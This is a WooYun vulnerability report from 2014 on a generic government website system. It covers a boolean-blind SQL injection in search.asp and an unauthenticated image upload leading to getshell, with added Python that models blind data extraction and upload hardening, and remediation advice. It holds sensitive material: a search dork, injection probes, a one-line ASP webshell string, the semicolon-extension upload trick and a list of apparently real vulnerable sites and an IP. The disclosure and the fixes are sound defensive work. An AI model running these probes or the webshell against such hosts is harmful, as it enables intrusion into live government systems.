
Vulnerability summary

Defect ID: wooyun-2014-081732

Title: SQL injection + unauthenticated (front-end) getshell in a generic government web system

Vendor: cncert

Author: 郭斯特

Submitted: 2014-11-04 18:35

Fix deadline: 2015-02-02 18:36

Public disclosure: 2015-02-02 18:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (cncert, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-04: Details sent to the vendor, awaiting vendor handling
2014-11-09: Vendor confirmed; details visible to the vendor only
2014-11-12: Details opened to third-party security partners
2015-01-03: Details opened to core white hats and domain experts
2015-01-13: Details opened to regular white hats
2015-01-23: Details opened to intern white hats
2015-02-02: Details made public

Brief description:

As the title says.

Detailed description:

Previously reported by someone else:
WooYun: 某通用型政府系统SQL注射 (SQL injection in a generic government system)
Google dork to find installations: inurl:zcfg_read.asp?id=
Injection type: search field, boolean-based blind
Injectable file: search.asp
POST body: text=1' (the single quote produces a database error)
http://www.hyxzfw.gov.cn/search.asp
POST body: text=1

http://www.wyxzfw.com/search.asp
POST body: text=1

http://www.gzshebao.org/search.asp

http://www.jshuaqiao.com/search.asp

http://www.xlinfo.gov.cn/search.asp

http://www.ccxzwzx.gov.cn/search.asp
POST body: text=1
http://60.8.102.174/search.asp
POST body: text=1
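
As an added illustration (not code from the report or from the affected product), the following Python models the query shape that search.asp appears to use and shows why the report's two probes behave as they do: text=1' breaks the query with a syntax error, and a condition injected after the search term either keeps the result set identical to a plain search or empties it, which is the signal a boolean-based blind injection reads. SQLite stands in for the real backend, and the table name, column names and rows are constructed assumptions; search_fixed shows the parameterised form that closes the hole.

```python
import sqlite3
import string

# Constructed stand-in for the site's content table (the real schema is not on the page).
ROWS = [
    (1, "Policy notice 1"),
    (2, "Policy notice 2"),
    (3, "Public announcement"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", ROWS)
    return conn


def search_vulnerable(conn, text):
    """Assumed shape of the query behind search.asp: the POST field 'text' is
    concatenated straight into a LIKE clause, so a quote breaks the query."""
    sql = "SELECT id FROM news WHERE title LIKE '%" + text + "%'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def search_fixed(conn, text):
    """Parameterised version: the input is bound as data and cannot alter the SQL."""
    sql = "SELECT id FROM news WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + text + "%",)).fetchall()]


def single_quote_breaks_query(conn):
    """The report's first probe: text=1' makes the backend throw a syntax error."""
    try:
        search_vulnerable(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


def blind_probe(conn, condition):
    """Boolean-based blind probe. The payload closes the LIKE string, ANDs in the
    attacker's condition and re-opens a string so the trailing %' still parses:
        ... LIKE '%1' AND (<condition>) AND '%'='%'
    The search returns the same rows as a plain search for '1' only when
    <condition> is true; an empty result set means it is false."""
    baseline = search_vulnerable(conn, "1")
    payload = "1' AND (" + condition + ") AND '%'='"
    return baseline != [] and search_vulnerable(conn, payload) == baseline


def blind_extract(conn, expr, max_len=40):
    """Recover the value of a scalar SQL expression one character at a time,
    which is how a boolean-based blind injection is actually exploited."""
    charset = string.ascii_letters + string.digits + " _"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if blind_probe(conn, "substr((%s), %d, 1) = '%s'" % (expr, pos, ch)):
                out += ch
                break
        else:
            break  # no character matched: end of the value
    return out


if __name__ == "__main__":
    db = make_db()
    print("quote breaks query:", single_quote_breaks_query(db))
    print("1=1 ->", blind_probe(db, "1=1"), " 1=2 ->", blind_probe(db, "1=2"))
    print("extracted:", blind_extract(db, "SELECT title FROM news WHERE id = 3"))
    print("fixed query with payload:", search_fixed(db, "1' AND (1=1) AND '%'='"))
```

Against the real application the same probe is sent as the POST field text and the "true" and "false" responses are told apart by page content rather than by a Python list; the charset and the substr() call would be adjusted to the backend's dialect. The parameterised search_fixed treats the whole payload as a literal and returns nothing, which is the behaviour to look for when verifying a fix.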

Proof of vulnerability:

Unauthenticated (front-end) getshell. Page source of the upload form:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Upload image</title>
<style type="text/css">
<!--
a { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: ; text-decoration: none}
a:hover { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: ; text-decoration: underline}
td { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: }
br { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: }
.bk { font-size: 9pt; border: 1px solid}
body { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none}
.an { font-family: "宋体"; font-size: 9pt; background-color: ; border: 1px solid; color: }
.xzy { border: solid; border-width: 0px 1px 1px}
.zx { border: solid; border-width: 0px 0px 1px 1px}
.sxz { border: solid; border-width: 1px 0px 1px 1px}
.s { border: ; border-style: solid; border-top-width: 1px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px}
.y { border: ; border-style: solid; border-top-width: 0px; border-right-width: 1px; border-bottom-width: 0px; border-left-width: 0px}
.font { font-family: "Arial Black"; font-size: 14pt; color: }
.x { border: ; border-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px}
.z { border: ; border-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 1px}
.sx { border: ; border-style: solid; border-top-width: 1px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px}
-->
</style>
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<form name="form1" method="post" action="saveupload1.asp" enctype="multipart/form-data">
<tr>
<td align="center">
<input type="file" name="file1" size=10 class="an">
<input type="submit" name="Submit" value="Upload" class="an">
</td>
</tr>
</form>
</table>
</body>
</html>
/administrator/upload1.asp
This page can be opened directly without logging in, and the upload it posts to (saveupload1.asp) applies no file-type filtering at all, so it leads straight to getshell.
http://www.wyxzfw.com/administrator/upload1.asp

http://www.ccxzwzx.gov.cn/administrator/upload1.asp

http://www.jshuaqiao.com/administrator/upload1.asp

http://www.gzshebao.org/administrator/upload1.asp
http://60.8.102.174/administrator/upload1.asp
Some of the other installations run SafeDog (安全狗). I have no AV-evading webshell here, so I stop at this point, but the vulnerability definitely exists.
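
The two defects in the upload path are that upload1.asp needs no login and that saveupload1.asp keeps whatever name and content the client sends. The following Python is an added example, not the product's code, showing what an unfiltered handler amounts to next to a hardened one; the internals of saveupload1.asp are assumed from the report, and the allow-list, magic bytes and sample uploads are constructed for the example.

```python
import os
import re
import secrets

# Magic bytes for the only types an "upload image" form needs to accept (assumption:
# the real saveupload1.asp has no such list, which is the bug the report describes).
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def unfiltered_target(upload_dir, client_filename):
    """Behaviour the report describes for saveupload1.asp (assumed internals):
    the client-supplied name is used as-is, so shell.asp lands on disk as .asp
    and is executed by IIS when requested."""
    return os.path.join(upload_dir, client_filename)


def hardened_target(upload_dir, client_filename, data):
    """Return a safe on-disk path for the upload, or None to reject it."""
    # Never let the client choose path components, NUL bytes, or ';' (IIS 6 serves
    # 'shell.asp;.jpg' as shell.asp).
    if re.search(r"[\\/\x00;]", client_filename):
        return None
    base, ext = os.path.splitext(client_filename)
    ext = ext.lower()
    # Exactly one extension, and only from the allow-list (never a deny-list of .asp etc.).
    if ext not in ALLOWED_TYPES or "." in base or not base:
        return None
    # The bytes must actually be that image type, not an ASP page renamed to .jpg.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return None
    # The stored name is generated server-side; the original name is never reused.
    return os.path.join(upload_dir, secrets.token_hex(16) + ext)


def handle_upload(session, upload_dir, client_filename, data):
    """upload1.asp sits under /administrator/ yet needs no login; the first fix is
    to require an authenticated admin session before touching the file at all."""
    if not session.get("is_admin"):
        return None
    return hardened_target(upload_dir, client_filename, data)


# Constructed sample uploads: a minimal JPEG header and a classic one-line ASP shell.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
ASP_SHELL = b'<%eval request("c")%>'


if __name__ == "__main__":
    admin = {"is_admin": True}
    print("unfiltered:", unfiltered_target("uploads", "shell.asp"))
    print("no session:", handle_upload({}, "uploads", "photo.jpg", JPEG_SAMPLE))
    print("shell.asp:", handle_upload(admin, "uploads", "shell.asp", ASP_SHELL))
    print("shell.asp;.jpg:", handle_upload(admin, "uploads", "shell.asp;.jpg", JPEG_SAMPLE))
    print("shell.jpg with ASP body:", handle_upload(admin, "uploads", "shell.jpg", ASP_SHELL))
    print("photo.jpg:", handle_upload(admin, "uploads", "photo.jpg", JPEG_SAMPLE))
```

The order of the checks matters less than the fact that every decision is made server-side from an allow-list: a deny-list of .asp/.asa/.cer is what products like this usually bolt on afterwards, and it is exactly what the semicolon and double-extension tricks are aimed at. Keeping the upload directory without script-execution permission in IIS is a useful second layer, but it does not replace the checks above.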

Fix:

Filter the input: parameterise the query behind search.asp rather than concatenating the POST field text into it, require an authenticated administrator session for everything under /administrator/ (upload1.asp and saveupload1.asp included), and restrict the upload to an allow-list of image extensions with server-generated file names.

Copyright notice: please credit 郭斯特@乌云 when reposting.


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 18

Confirmed at: 2014-11-09 09:30

Vendor comment:

Latest status:

None yet

